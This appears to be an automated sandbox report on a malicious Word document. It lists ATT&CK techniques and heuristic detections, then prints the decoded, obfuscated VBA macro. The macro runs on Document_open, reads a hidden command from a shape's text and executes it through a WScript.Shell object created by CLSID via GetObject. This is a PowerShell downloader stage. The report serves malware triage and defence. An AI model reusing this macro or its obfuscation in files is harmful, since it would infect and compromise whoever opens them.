MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro references PowerShell and uses a GetObject call, indicating an attempt to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Powload-6826406-0' further supports this analysis.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6826406-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6826406-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set pioKoohEi = CVar(GetObject(zzVGdbm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + uEqkat)) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6183 bytes |
SHA-256: 6dc5eab2ef7db1e3910355e95e3c7a5225318c4609379286de67a0e5d8de8aff |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
103 of 169 identifiers look randomly generated (e.g. 'ENZkzVkrwHXj') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "kYcNZziqSc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HbLfJ = (CbhKFjwL - Oct(XqKRmdJL) * vfLsMp - Sgn(315108826) - 206071902 + Fix(LSZSrIUQz) + 1980455239 + 340157444 / 42441401 / CDJdToh)
Select Case cwPtjiXKO
Case 285538733
ZpltJE = CLng(334683445)
wWjfM = Int(acHiiW)
Case 51648432
DiUJYIiwF = Hex(224800778)
kjfRKAYU = CStr(252718056 * CByte(TwSDhJBQ))
End Select
On Error Resume Next
TtWTlOCRX = (psuTmwazZ - Oct(zLhRX) * cfmbd - Sgn(261163446) - 231883176 + Fix(Mliwsqqw) + 921620729 + 45547375 / 21015205 / UQRCzidO)
Select Case ILFvfmWiw
Case 103076647
JHHAR = CLng(185441811)
jJAza = Int(mlLOkb)
Case 336650967
UtEZZD = Hex(88908060)
URRrB = CStr(187471433 * CByte(JQlXat))
End Select
Set LkrJtbIuV = Shapes("ENZkzVkrwHXj")
On Error Resume Next
KvQrZXM = (mLiXF - Oct(LjICVZu) * GFqFC - Sgn(282495377) - 91895472 + Fix(BvzABafj) + 2397995189# + 109198032 / 257245437 / DhULGkwvs)
Select Case dvfBpKB
Case 136953605
VvwJjXE = CLng(192531651)
EZREmwFY = Int(iwRsSvYR)
Case 27489104
zkUiPuR = Hex(4111712)
YkoCG = CStr(90980284 * CByte(SLYJhwRZW))
End Select
On Error Resume Next
bJOoj = (RYfatwCZY - Oct(YvbjofJ) * jawMiV - Sgn(193765279) - 223482296 + Fix(TBDdFD) + 461793659 + 10240710 / 151752759 / SzpUcPtw)
Select Case BhSwAvI
Case 60957878
FpKzLiiYU = CLng(315167601)
rUiRzq = Int(qFWwpYG)
Case 214961161
AFChzuKv = Hex(218894797)
VmHlDuz = CStr(197538492 * CByte(jCBwJaS))
End Select
SrwaJNFYqrT = "" + ROVzKi + zjzItHf + VijTTCr + Alqiz + njjiIHE + LkrJtbIuV.TextFrame.TextRange.Text + ijHGIqPi + jIiWTRS + KYHpFav
On Error Resume Next
UNSNSAF = (dLivi - Oct(ZUVzVmPj) * LqosiXqtz - Sgn(239142251) - 211780110 + Fix(QqUtWTZWr) + 1345235849 + 155403515 / 39717219 / atBzbCJnS)
Select Case XdHbd
Case 256261722
iKwqJi = CLng(7478954)
wTpKD = Int(SiBDipwYh)
Case 151425805
wjwPO = Hex(292650961)
jZpMHARPA = CStr(285016291 * CByte(jTdOQEv))
End Select
On Error Resume Next
stzzPf = (bwmuJ - Oct(jTRhoV) * HwpoEw - Sgn(157848643) - 264289651 + Fix(chVFljZiw) + 584896419 + 221683828 / 140628459 / VUZOMTl)
Select Case TSiAL
Case 315764401
JtQHN = CLng(219508304)
FYDjwu = Int(jfnwlaUO)
Case 273128944
ECpIOrFZ = Hex(261931835)
UEsZHpB = CStr(101651831 * CByte(LdWrS))
End Select
Set pioKoohEi = CVar(GetObject(zzVGdbm + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + uEqkat))
On Error Resume Next
ULKOXN = (VioqSK - Oct(wHjkj) * SnhIfMThE - Sgn(232174378) - 212876714 + Fix(GJpsdpq) + 1115664589 + 312050825 / 142750933 / dbVRFN)
Select Case buwMu
Case 216788269
CiLtfQv = CLng(51245210)
MBPGdq = Int(SvwYEjJuO)
Case 129424832
HmYtO = Hex(53257314)
bHfXQF = CStr(128641981 * CByte(IJQqGal))
End Select
On Error Resume Next
rdjOXB = (lmGDrzYl - Oct(wpRiE) * VHDzBADZ - Sgn(12076840) - 166228629 + Fix(LJAozDUC) + 398747719 + 280357363 / 68088478 / wHKckGAOR)
Select Case BHcLZ
Case 3470902
iMEiKmOk = CLng(129555729)
mwfww = Int(KHqqXT)
Case 129733532
KPDHt = Hex(76349899)
dUTXiFSm = CStr(137976910 * CByte(sQFORmKCw))
End Select
On Error Resume Next
LiYLab = (WbGvpa - Oct(Wvmitt) * DqdYB - Sgn(32585701) - 295852876 + Fix(EiMdoXFHD) + 2195424779# + 298380489 / 233328133 / RBiNIvc)
Select Case RIrPLIn
Case 304820031
YWTWXYjL = CLng(252558455)
RnjwAJZlo = Int(KsJQamZVN)
Case 191079135
RNQIWP = Hex(55655729)
dvBWALlhL = CStr(283077438 * CByte(mWzuc))
End Select
Const MbUuipIoc = 0
On Error Resume Next
BpHah = (VtuiX - Oct(vKmFR) * mDXhw - Sgn(13817592) - 258761016 + Fix(UjInukw) + 1062456569 + 186163653 / 280896985 / SLpISFSZF)
Select Case GniwJ
Case 210342120
iTsFn = CLng(53831626)
mlHnmEfi = Int(KwwwuFcdc)
Case 223533593
NwiokF = Hex(274283081)
IwpfDHVj = CStr(325463635 * CByte(mAZXrTz))
End Select
On Error Resume Next
qZjNPfMi = (ZRoBvO - Oct(OSDSiDsc) * FfuWhECJ - Sgn(151513833) - 39322266 + Fix(zjucvH) + 2517187869# + 170105207 / 178207685 / nFtMrWXRz)
Select Case jHiJASHj
Case 137271723
fipujh = CLng(155572571)
WbQSBlR = Int(AKqifsX)
Case 121919748
rClcdADE = Hex(83689704)
JPzjJw = CStr(324895916 * CByte(YWNGssZRw))
End Select
NYqOcFnU = Array(GSChPtZwV, pioKoohEi.Run!(SrwaJNFYqrT, MbUuipIoc), soZYfw)
On Error Resume Next
AniAfLQU = (VDAzjSwr - Oct(UFIlqSOh) * oazzFvw - Sgn(104403338) - 152360382 + Fix(OtQKI) + 563926339 + 163239322 / 93057757 / XiNSXHBY)
Select Case PwPlzjb
Case 303876843
WwFCQvnc = CLng(313481459)
vAcRE = Int(KAbHbrD)
Case 150570174
Aatdvjj = Hex(92655328)
CPkUNRf = CStr(313045653 * CByte(zdbmiK))
End Select
On Error Resume Next
WlwPr = (MJDbnM - Oct(TZBXJ) * iAwszwqip - Sgn(248100846) - 285039856 + Fix(uBKtBbdmZ) + 2286992959# + 132203223 / 185066215 / AUzvisFr)
Select Case TzZswQAhX
Case 156885382
hsKzaX = CLng(171121772)
WVvjUHzir = Int(GtlBvhKT)
Case 62921454
MlrLwQD = Hex(52835929)
CVKSL = CStr(137988165 * CByte(XTEkAlJ))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.